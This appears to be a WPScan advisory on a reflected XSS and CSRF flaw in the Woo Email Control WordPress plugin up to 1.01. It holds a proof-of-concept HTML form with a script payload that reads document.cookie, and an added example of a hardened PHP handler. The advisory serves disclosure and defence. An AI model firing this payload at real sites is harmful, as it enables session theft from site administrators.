Woo Email Control <= 1.01 - Reflected Cross-Site Scripting (XSS) & CSRF

Description
Due to a lack of encoding and CSRF mitigation in the test_email function (line 106 of classes/class-wooctrl.php), a request to the AJAX handler for the wooctrl_send_test_email action can be automated, and the handler reflects the specified script back to the end user.

Proof of Concept
<form method="post" action="http://<target>/wp-admin/admin-ajax.php?action=wooctrl_send_test_email">  
    <input type="text" name="email_class" value="WC_Email_Customer_New_Account">
    <input type="text" name="recipient" value="user@user.com<img src=x onerror=alert(document.cookie)>">
    <input type="submit" value="Test">
</form>  
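
One way a handler for this action could close both gaps, shown as an added example that is not the plugin's code or its 1.02 fix. It assumes WordPress has loaded it as part of a plugin with WooCommerce active; the function name, the nonce action `example_wooctrl_test_email`, the `nonce` field and the placeholder message are hypothetical.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's own code.
// Assumes WordPress loaded this file from a plugin and WooCommerce is active.

add_action( 'wp_ajax_wooctrl_send_test_email', 'example_wooctrl_send_test_email' );

function example_wooctrl_send_test_email() {
	// CSRF: require a nonce bound to the logged-in user's session. The admin page
	// would emit it with wp_create_nonce( 'example_wooctrl_test_email' ) (assumed name).
	if ( ! check_ajax_referer( 'example_wooctrl_test_email', 'nonce', false ) ) {
		wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
	}

	// Authorization: wp_ajax_* only guarantees a logged-in user, not a shop manager.
	if ( ! current_user_can( 'manage_woocommerce' ) ) {
		wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
	}

	// Validate instead of repairing: is_email() returns false for the PoC value,
	// because "<", ">", "=" and spaces are not valid in the domain part.
	$recipient = isset( $_POST['recipient'] ) ? wp_unslash( $_POST['recipient'] ) : '';
	if ( ! is_string( $recipient ) || ! is_email( $recipient ) ) {
		wp_send_json_error( array( 'message' => 'Recipient is not a valid email address.' ), 400 );
	}

	// Allow-list the class name against the emails WooCommerce has registered.
	$email_class = isset( $_POST['email_class'] )
		? sanitize_text_field( wp_unslash( $_POST['email_class'] ) )
		: '';
	$registered = WC()->mailer()->get_emails(); // array keyed by class name
	if ( ! isset( $registered[ $email_class ] ) ) {
		wp_send_json_error( array( 'message' => 'Unknown email class.' ), 400 );
	}

	// Stand-in for the plugin's own rendering: send a plain placeholder message.
	$sent = wp_mail( $recipient, 'Test email', 'Test of ' . $email_class );
	if ( ! $sent ) {
		wp_send_json_error( array( 'message' => 'The test email could not be sent.' ), 500 );
	}

	// Output encoding: the response is JSON (not text/html) and the echoed value
	// is escaped, so a front end that inserts it into the page gets inert text.
	wp_send_json_success(
		array( 'message' => 'Test email sent to ' . esc_html( $recipient ) )
	);
}
```

Each `wp_send_json_error()` call ends the request, so no later step runs once a check fails.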

Affects

Plugin woo-email-control
fixed in version 1.02

References

URL http://blog.rastating.com/woo-email-control-1-01-reflected-xss-disclosure/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Rob Carr
Submitter Website http://blog.rastating.com/
Submitter Twitter iamrastating
Views 179
Verified No
WPVDB ID 8559

Timeline

Publicly Published 2016-07-19
Added 2016-07-19
Last Updated 2016-07-19

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.